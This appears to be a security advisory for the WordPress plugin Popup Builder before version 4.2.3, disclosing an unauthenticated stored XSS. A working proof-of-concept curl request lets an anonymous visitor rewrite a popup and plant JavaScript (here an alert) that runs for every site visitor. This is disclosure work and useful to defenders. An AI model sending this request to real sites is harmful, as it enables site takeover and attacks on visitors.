Popup Builder < 4.2.3 - Unauthenticated Stored XSS

Description The plugin does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.

PoC

1. Create a popup using the plugin 2) Run the following curl command, switching $POPUPID with that popup’s ID: curl --url 'http://vulnerable-site.tld/' --data 'sgpb-is-preview=1&blah;[name]=sgpb-is-preview&blah;[value]=0&post;_ID=$POPUPID&sgpb-target;%5B0%5D%5B0%5D%5Bparam%5D=everywhere&sgpb-type;=html&sgpb-is-active;=checked&sgpb-events;%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events;%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events;%5B0%5D%5B0%5D%5Bparam%5D=contact-form-7&sgpb-behavior-after-special-events;%5B0%5D%5B0%5D%5Boperator%5D=redirect-url&sgpb-behavior-after-special-events;%5B0%5D%5B0%5D%5Bvalue%5D=https%3A%2F%2Fexample.com&sgpb-popup-z-index;=9999&sgpb-popup-themes;=sgpb-theme-1&sgpb-overlay-color;=&sgpb-overlay-opacity;=0.8&sgpb-content-custom-class;=sg-popup-content&sgpb-esc-key;=on&sgpb-enable-close-button;=on&sgpb-close-button-delay;=0&sgpb-close-button-position;=bottomRight&sgpb-button-position-top;=&sgpb-button-position-right;=9&sgpb-button-position-bottom;=9&sgpb-button-position-left;=&sgpb-button-image;=&sgpb-button-image-width;=21&sgpb-button-image-height;=21&sgpb-border-color;=%23000000&sgpb-border-radius;=0&sgpb-border-radius-type;=%25&sgpb-button-text;=Close&sgpb-overlay-click;=on&sgpb-popup-dimension-mode;=responsiveMode&sgpb-responsive-dimension-measure;=auto&sgpb-width;=640px&sgpb-height;=480px&sgpb-max-width;=&sgpb-max-height;=&sgpb-min-width;=120px&sgpb-min-height;=&sgpb-copy-to-clipboard-message;=Copied+to+Clipboard%21&sgpb-open-animation-effect;=No+effect&sgpb-close-animation-effect;=No+effect&sgpb-enable-content-scrolling;=on&sgpb-popup-order;=0&sgpb-popup-delay;=0&sgpb-ShouldOpen;=alert%28document.domain%29%3B&sgpb-WillOpen;=&sgpb-DidOpen;=&sgpb-ShouldClose;=&sgpb-WillClose;=&sgpb-DidClose;=&sgpb-css-editor;=' 3) Visit the site